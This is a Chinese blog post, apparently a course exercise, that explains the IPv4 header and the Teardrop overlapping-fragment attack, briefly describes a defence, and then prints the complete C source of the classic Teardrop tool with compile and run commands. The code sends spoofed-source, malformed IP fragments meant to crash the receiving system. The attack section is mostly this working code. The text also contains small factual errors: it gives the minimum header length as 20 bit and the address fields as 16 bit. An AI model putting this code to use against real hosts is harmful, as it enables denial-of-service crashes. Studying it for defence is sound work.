Teardrop攻击 —— 创建虚假的IP数据包

最新推荐文章于 2024-05-30 11:55:02 发布
最新推荐文章于 2024-05-30 11:55:02 发布
阅读量534 收藏 3
点赞数
分类专栏: 网络 文章标签: 网络 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xwmrqqq/article/details/110454516
版权

文章目录

一、IP协议介绍

IP协议是一种best efforts协议,不保证可靠性,数据包可能重复、丢失;无连接协议,同一个连接中的多个报文被独立对待。IP协议主要定义了数据传送的基本单位;执行路由功能;主要规定了主机和路由器应该如何处理数据包;在什么情况下产生错误信息;以及什么情况下应该丢弃数据包。

目前普遍使用的还是IPv4,报文格式如下:

分析说明:

  • 版本(4bit):4代表IPv4
  • 首部长度(4bit):这里的5代表5*4=20,将这里的数乘以4就是首部的长度,因此我们抓取的这个数据报的IP首部长度为20
  • 区分服务(8bit):用来获得更好的服务。这个字段在旧标准中叫做服务类型,但实际上一直没有被使用过,其一般位0
  • 总长度(16bit):代表IP数据报的总长度,单位是字节,共16位,因此IP数据报最大长度为2^16-1=65535字节
  • 标识(16bit):用于标识IP数据报。由于在不同的网络环境中的MTU不同,IP数据报有时需要分片,为了正确重组IP数据报,故每个数据报有标识字段,标识该分组的一个随机号
  • 标志(3bit):最低一位为MF(more fragment)标识后面是否还有碎片,中一位DF(don’t fragment)表示该数据报是否允许被分片
  • 片偏移(13bit):用于标识该碎片在整个数据报中的位置
  • 检验和(16bit):仅校验头部,而不检验数据部分
  • TTL(8bit):单位是路由次数,表示最多经过多少路由
  • 协议(8bit):携带的数据是何种协议,即该数据应该交付至哪层传输层协议,其中6表示TCP,17表示UDP
  • 源IP(16bit)
  • 目的IP(16bit)

其中一个IP数据包的包头长度最小为20bit

二、什么是Teardrop攻击

  1. 攻击原理

    攻击者A给受害者B发送一些分片IP报文,并且故意将“13位分片偏移”字段设置成错误的值(既可与上一分片数据重叠,也可错开),B在组合这种含有重叠偏移的伪造分片报文时,会导致系统崩溃。如下图所示

  2. 防御方法

    网络安全设备将接收到的分片报文先放入缓存中,并根据源IP地址和目的IP地址对报文进行分组,源IP地址和目的IP地址均相同的报文归入同一组,然后对每组IP报文的相关分片信息进行检查,丢弃分片信息存在错误的报文。为了防止缓存益处,当缓存快要存满是,直接丢弃后续分片报文。

三、编写Teardrop程序(创建一个虚假的IP数据包)

  1. Ubuntu 系统下。创建一个 Teardrop.c 文件,写入如下内容:

    #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else  
/* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000  /* More IP fragment en route */
#define IPH 0x14    /* IP header size */
#define UDPH 0x8     /* UDP header size */
#define PADDING  0x1c    /* datagram frame padding for first packet */
#define MAGIC  0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT 0x1      /* Linux dies with 1, NT is more stalwart and can
                        * withstand maybe 5 or 10 sometimes...  Experiment.*/
                    

void usage(u_char *);
u_long name_resolve(u_char *);
void send_frags(int, u_long, u_long, u_short, u_short);


int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    // 定义源地址和目的地址
    u_long src_ip = 0, dst_ip = 0;
    // 定义源端口和目的端口
    u_short src_prt = 0, dst_prt = 0;
    // 定义一个32位的IPv4地址
    struct in_addr addr;
    printf("teardrop route|daemon9\n\n");
    //创建原始套接字
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        fprintf(stderr, "raw socket");
        exit(1);
    }
    //设置套接字选项IP_HDRINCL
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,
    (char *)&one, sizeof(one))< 0)
    {
        fprintf(stderr, "IP_HDRINCL");
        exit(1);
    }
    if (argc < 3)
        usage(argv[0]);
    // 设置源IP 和 目的IP
    if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }
    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's': // source port (should be emphemeral)
            src_prt = (u_short)atoi(optarg);
            break;
            case 't': // dest port (DNS, anyone?)
            dst_prt = (u_short)atoi(optarg);
            break;
            case 'n': // number to send
            count = atoi(optarg);
            break;
            default :
            usage(argv[0]);
            break; // NOTREACHED
        }
    }
    srandom((unsigned)(utimes("0",(time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)
    count = COUNT;
    printf("Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    printf(" Amt: %5d\n", count);
    printf("[\n ");
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        // printf("b00m ");
        usleep(500);
    }
    printf("]\n");
    return (0);
}


// 设置 IP 包的内容
void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers
    u_char byte; // a byte
    // 套接字地址结构
    struct sockaddr_in sin; /* socket protocol structure */
    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr = packet;
    flag = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    // IP version and header length
    byte = 0x45;
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; // IP TOS (skipped)
    // total length
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242); // IP id
    p_ptr += 2;
    //IP frag flags and offset
    *((u_short *)p_ptr) |= FIX(IP_MF);
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40; // IP TTL
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    // IP checksum filled in by kernel
    p_ptr += 4;
    // IP source address
    *((u_long *)p_ptr) = src_ip;
    p_ptr += 4;
    // IP destination address
    *((u_long *)p_ptr) = dst_ip;
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt); // UDP source port
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt); // UDP destination port
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(PADDING); // UDP total length
    p_ptr += 4;
    
    // 发送数据:Fake News
    *((u_short *)p_ptr) = 0x46;
    p_ptr++;
    *((u_short *)p_ptr) = 0x61;
    p_ptr++;
    *((u_short *)p_ptr) = 0x6B;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x20;
    p_ptr++;
    *((u_short *)p_ptr) = 0x4E;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x77;
    p_ptr++;
    *((u_short *)p_ptr) = 0x73;

    int i=1;
    while(i <= 56)
    {
	printf("%x\t",*flag);
	flag++;
        if(0 == i%8)
	    printf("\n");
        i++;
    }

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0,
    (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
    {
        fprintf(stderr, "\nsendto");
        free(packet);
        exit(1);
    }
    // IP total length is 2 bytes into the header
    p_ptr = &packet[2];
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    // IP offset is 6 bytes into the header
    p_ptr += 4;
    *((u_short *)p_ptr) = FIX(MAGIC);
    if (sendto(sock, packet, IPH+MAGIC+1, 0,
    (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
    {
        fprintf(stderr, "\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}


// 获取主机信息
u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;
    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
            bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}


void usage(u_char *name)
{
    fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",name);
    exit(0);
}

  2. 编译运行

    gcc Teardrop.c -o Teardrop
sudo ./Teardrop 100.100.100.100 200.200.200.200

  3. wireshark 抓包如下:

四、参考资料和🔗

在下摸鱼怪
关注
专栏目录
TearDrops(泪滴攻击)教程
weixin_43981915的博客
08-03 4428
TearDrops(泪滴攻击) 脚本下载地址,——>点击下载<—— 用ssh把hping2.0.0-rc3.tar.gz上传到kali的 /usr/local目录下 进入/usr/local目录并查看其下面的文件 利用tar –zxvf hping2.0.0-rc3.tar.gz命令解压缩。 进入 /usr/loca/hping2-rc3/ 目录 利用./configure命令进行配置...
Teardrop攻击--伪造虚假IP数据包发送并抓取及完成简易静态网页
qq_48008050的博客
12-04 4538
目录一、相关介绍1.IP协议2.Teardrop攻击二、编写Teardrop程序(伪造一个虚假地址的IP包)三、参考链接 一、相关介绍 1.IP协议 IP是Internet Protocol(网际互连协议)的缩写,是TCP/IP体系中的网络层协议。设计IP的目的是提高网络的可扩展性:一是解决互联网问题,实现大规模、异构网络的互联互通;二是分割顶层网络应用和底层网络技术之间的耦合关系,以利于两者的独立发展。根据端到端的设计原则,IP只为主机提供一种无连接、不可靠的、尽力而为的数据包传输服务。 目前普遍使用的
什么是Teardrop攻击
nny715的专栏
03-14 8496
Tear是“眼泪”的意思,drop是“掉落”的意思,顾名思义,Teardrop是一种令人落泪的攻击方法,可见其威力之强大 Teardrop攻击原理是:攻击者A给受害者B发送一些分片IP报文,并且故意将“13位分片偏移”字段设置成错误的值(既可与上一分片数据重叠,也可错开),B在组合这种含有重叠偏移的伪造分片报文时,会导致系统崩溃。如下图所示:         Teardrop防御方法:
Wireshark数据包分析——Teardrop泪滴攻击
PP_zi的博客
08-22 3982
分析Teardrop数据包
Teardrop攻击初体验
CHL的博客
12-04 1794
目录一、Teardrop攻击1.Teardrop攻击介绍2.检测方法二、Teardrop程序代码编写三、参考资料 一、Teardrop攻击 1.Teardrop攻击介绍 Teardrop攻击是一种畸形报文攻击。是基于UDP的病态分片数据包攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息),某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。 2.检测方法 对接收到的分片数据包进行分析,计算数据包的片偏移量
什么是Teardrop攻击?我们要如何防御Teardrop攻击
驰网云儿
11-13 6078
Teardrop攻击是一种拒绝服务攻击,是一种基于UDP的病态分片数据包攻击方法,英文“Tear”是“眼泪”的意思,“drop”是“掉落”的意思,顾名思义,Teardrop攻击是一种令人落泪的攻击手段,可见其破坏威力很强大 主要针对早期微软操作系统(95、98、3.x、nt)近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效 攻击效果 被攻击者会出现蓝屏、重启、卡死等情况 1、Teardrop攻击原理 Teardrop攻击工作原理是攻击者A给受害者B发送一些分片I..
Teardrop攻击——发送虚假IP包信息
TBMmagic的博客
12-03 952
一、原始套接字概述 原始套接字,指在传输层下面使用的套接字。流式套接字和数据报套接字这两种套接字工作在传输层,主要为应用层的应用程序提供服务,并且在接收和发送时只能操作数据部分,而不能对IP首部或TCP和UDP首部进行操作,通常把这两种套接字称为标准套接字。 但是,如果我们开发的是更底层的应用,比如发送一个自定义的IP包、UDP包、TCP包或ICMP包,捕获所有经过本机网卡的数据包,伪装本机的IP,想要操作IP首部或传输层协议首部,等等,这些功能对于这两种套接字就无能为力了。这些功能需要使用另一种套接字
产生虚假的用于欺骗的IP数据包程序实践——Teardrop
clyrjj的博客
12-04 926
文章目录一、协议与原理二、实验三、小结与参考链接 一、协议与原理 IP协议 IP协议是网络中最繁忙的协议。IP协议是一种best efforts协议,不保证可靠性,数据包可能重复、丢失;无连接协议,同一个连接中的多个报文被独立对待。IP协议主要定义了数据传送的基本单位;执行路由功能;主要规定了主机和路由器应该如何处理数据包;在什么情况下产生错误信息;以及什么情况下应该丢弃数据包IPV4的报头格式 下面详细描述ipv4报头中各个字段的含义: ·Version(版本): 该字段长度为4比特位。标识I
学习teardrop攻击并伪造一个ip
qq_46051625的博客
12-03 812
编译环境:Ubuntu18.04 编程语言:c语言 使用原始套接字编程中的 Teardrop 代码编程,伪造一个虚假地址的 IP 包,包的内容填入 Fake News ,发送此包,并用 wireshark 抓包进行验证。 一、了解teardrop攻击原理 1.什么是原始套接字 原始套接字的含义就是在传输层之下使用的套接字,它提供了一些 TCP 和 UDP 套接字无法提供的功能,即: (1)使用原始套接字可以读写 ICMP 和 IGMP 协议的数据包,如著名的 Ping 程序; (2)使用原始套接字可以读
网络通信】Teardrop编程创造虚假IP
weixin_43704348的博客
01-05 267
1
Teardrop
10-25
Teardrop
IP伪装软件
09-28
一款不错ip伪装软件,可用于破解游戏ip注册限制。
Teardrop代码编程
y98989的博客
12-06 254
Teardrop代码编程 teardop简介: Teardrop攻击是一种畸形报文攻击。是基于UDP的病态分片数据包攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息),某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。 攻击特征: Teardrop是基于UDP的病态分片数据包攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息)
TearDrop拒绝服务攻击
分享学习网络的点点滴滴
11-06 912
● 针对Android、IOS系统得攻击(teardrop_android_ios.py)● 针对早期windows系统SMB协议得攻击(teardrop_smb.py)○ 近些年有人发现对2.x版本的Android系统,6.1的IOS系统攻击有效。○ 使用IP分段偏移值实现分段覆盖,接收端处理分段覆盖时可被拒绝服务。● 主要针对早期微软操作系统(95、98、3.x、nt)● 攻击向量并不确定,要具体协议进行分析。○ 被攻击者蓝屏、重启、卡死。
利用 Scapy 库编写 Teardrop 攻击脚本
最新发布
Flag少侠的博客
05-30 5635
Teardrop攻击是一种利用IP分片重组漏洞进行拒绝服务的攻击方式。尽管现代操作系统和网络设备通常已经修复了相关漏洞,但了解这种攻击方式对于理解网络安全和历史漏洞仍然非常重要。通过及时更新系统、部署安全设备和监控网络流量,可以有效防御此类攻击
Teardrop代码编程,创建虚假
qq_45931327的博客
12-05 258
Teardrop代码编程 Teardrop代码编程,伪造一个虚假地址的IP包,包的内容填入Fake News。发送此包。并用wireshark抓包进行验证。
IP安全,DDoS攻击、tearDrop攻击和微小IP碎片攻击
weixin_30279315的博客
08-15 808
目录 arp安全 IP报文格式 DoS攻击 tear drop攻击 微小碎片攻击 IP欺骗,留后门 arp安全 以太网帧的type =0806 表示arp arp攻击:hack伪造arp应答包给target(当target使用...
原始套接字 IP_HDRINCL
08-30 1522
原始套接字可以访问ICMP和ICMP等协议包,可以读写内核不处理的IP数据包。可以创建自定义的IP数据包首部。一句话,使用原始套接字可以   编写基于IP协议的通讯程序。   1.创建原始套接字具体格式如下:int sockfd;sockfd = socktet(A...
原始套接字
03-21 509
原始套接字可以访问ICMP和ICMP等协议包,可以读写内核不处理的IP数据包。可以创建自定义的IP数据包首部。一句话,使用原始套接字可以  编写基于IP协议的通讯程序。  1.创建原始套接字具体格式如下:int sockfd;sockfd = socktet(AF_INET, SOCK_RAW, IPPROTO_ICMP);第一个参数:协议族 AF_INET 代表TCP/IP协议第二个参数:SOC
TearDrop攻击IP网络分片重组原理详解
"《TearDrop攻击IP网络基础知识及原理详解》一文主要探讨了IP网络中的一个安全问题——TearDrop攻击,这是一种利用IP分片机制进行的拒绝服务攻击。文章首先从IP网络的基础概念出发,介绍了IP协议的核心组成部分,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值